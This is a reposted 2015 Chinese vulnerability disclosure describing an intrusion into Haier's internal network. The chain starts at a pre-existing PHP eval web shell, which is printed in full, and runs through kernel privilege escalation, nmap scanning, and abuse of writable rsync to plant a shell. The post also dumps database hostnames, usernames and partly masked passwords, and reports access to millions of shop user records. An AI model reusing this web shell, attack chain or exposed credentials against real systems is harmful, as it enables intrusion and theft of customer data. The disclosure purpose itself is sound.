频道栏目
首页 > 安全 > 网站安全 > 正文
海尔某遗留问题导致可访问商城主库及解决方案
2015-01-14 10:09:33         来源:乌云  
收藏   我要投稿

海尔某遗留问题进入内网 加之 内网防护过于薄弱 可导致商城用户、订单库泄露

https://zixun.ehaier.com/ 为wordpress搭建

对之前常见批量getshell特征匹配 成功找到一个后门

https://zixun.ehaier.com/wp-content/themes/radius/404.php
 

Snip20141203_16.png

后门创建时间为13-7-21

<?php @eval($_POST['pass']);?>

典型的php一句话

如果进行过查杀很容易发现

uname -a
Linux zixun-01.hst.ehaieridc.net 2.6.18-128.el5xen #1 SMP Wed Dec 17 12:01:40 EST 2008 x86_64 x86_64 x86_64 GNU/Linux



内核版本比较老 可以直接进行提权
 

Snip20141203_19.png

 

Snip20141203_20.png

对网络基本结构进行分析
 

Snip20141203_17.png

发现基本通信都是在10.9.10.1/24网段进行

本机已经安装了nmap,使用nmap对c段进行基本扫描

经过筛选发现 10.9.10.135 开启了rsync未授权访问

Snip20141203_21.png



web访问 10.9.10.135 开启了 401认证

由于rsync可写 下载.htpasswd 然后添加一个用户test:123456

登陆成功。

然后同步一个shell上去,成功getshell。

 

Snip20141203_22.png

 

Snip20141203_24.png


登陆时发现这web的功能是统计网站数据,包含用户、订单、访问等等

猜测有连接数据库的关键文件

查找配置文件,找到main_pro.php果然发现很多数据库配置

'db'=>array(
'class' => 'CDbConnection', 
'connectionString' => 'mysql:host=10.9.10.61;dbname=db_mnt',
'emulatePrepare' => true,
'username' => 'imgfilter',
'password' => '*********',
'charset' => 'utf8',
'tablePrefix' => '',
),
'db_mobile_mnt'=>array(
'class' => 'CDbConnection', 
'connectionString' => 'mysql:host=my-cps-wrt.vip.ehaieridc.net;dbname=db_mobile_mnt',
'emulatePrepare' => true,
'username' => 'report',
'password' => '*********',
'charset' => 'utf8',
'tablePrefix' => '',
),
'db_analysis' =>array(
'class' => 'CDbConnection', 
'connectionString' => 'mysql:host=my-cps-wrt.vip.ehaieridc.net;dbname=ehaier_analysis_db',
'emulatePrepare' => true,
'username' => 'report',
'password' => '*********',
'charset' => 'utf8',
'tablePrefix' => 'tbl_',
),
'data_analysis' =>array(
'class' => 'CDbConnection', 
'connectionString' => 'mysql:host=my-cps-wrt.vip.ehaieridc.net;dbname=data_analysis',
'emulatePrepare' => true,
'username' => 'report',
'password' => '*********',
'charset' => 'utf8',
'tablePrefix' => '',
),
'db_shop' =>array(
'class' => 'CDbConnection', 
'connectionString' => 'mysql:host=my-www-rnd.vip.ehaieridc.net;dbname=Shop',
'emulatePrepare' => true,
'username' => 'pec',
'password' => '*********',
'charset' => 'utf8',
'tablePrefix' => '',
),
'db_shopattributes' =>array(
'class' => 'CDbConnection', 
'connectionString' => 'mysql:host=my-www-rnd.vip.ehaieridc.net;dbname=ShopAttributes',
'emulatePrepare' => true,
'username' => 'pec',
'password' => '*********',
'charset' => 'utf8',
'tablePrefix' => '',
),
'db_stock' =>array(
'class' => 'CDbConnection', 
'connectionString' => 'mysql:host=my-cbs-rnd.vip.ehaieridc.net;dbname=db_stock',
'emulatePrepare' => true,
'username' => 'cbs_stock_ro',
'password' => '**********D)(]*********[zdF',
'charset' => 'utf8',
'tablePrefix' => '',
),
'db_eis' =>array(
'class' => 'CDbConnection', 
'connectionString' => 'mysql:host=my-cbs-wrt.vip.ehaieridc.net;dbname=db_eis',
'emulatePrepare' => true,
'username' => 'cbs_eis_ser',
'password' => 'cBs*{*********',
'charset' => 'utf8',
'tablePrefix' => '',
),
'db_mobile' =>array(
'class' => 'CDbConnection', 
'connectionString' => 'mysql:host=my-shop-rnd.vip.ehaieridc.net;dbname=m_shop',
'emulatePrepare' => true,
'username' => 'm_shop_ro',
'password' => '*********',
'charset' => 'utf8',
'tablePrefix' => '',
),







连接'connectionString' => 'mysql:host=my-www-rnd.vip.ehaieridc.net;dbname=Shop',

的数据库

 

Snip20141203_26.png




 

Snip20141203_27.png

用户473w

为了验证是线上数据库 我注册了一个账号 在数据库中马上查到了

 

Snip20141203_28.png

 

Snip20141203_29.png



订单
 

Snip20141203_32.png

 

Snip20141203_31.png





黑客入侵内网 无非就是想要这些 已经没有必要继续深入
 

解决方案:

边界安全做好

经常对服务器进行体检

做好内网安全

点击复制链接 与好友分享!回本站首页
上一篇:中石化某业务存在任意文件下载漏洞
下一篇:帝国备份王(Empirebak)万能cookie及拿shell
相关文章
图文推荐
点击排行

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站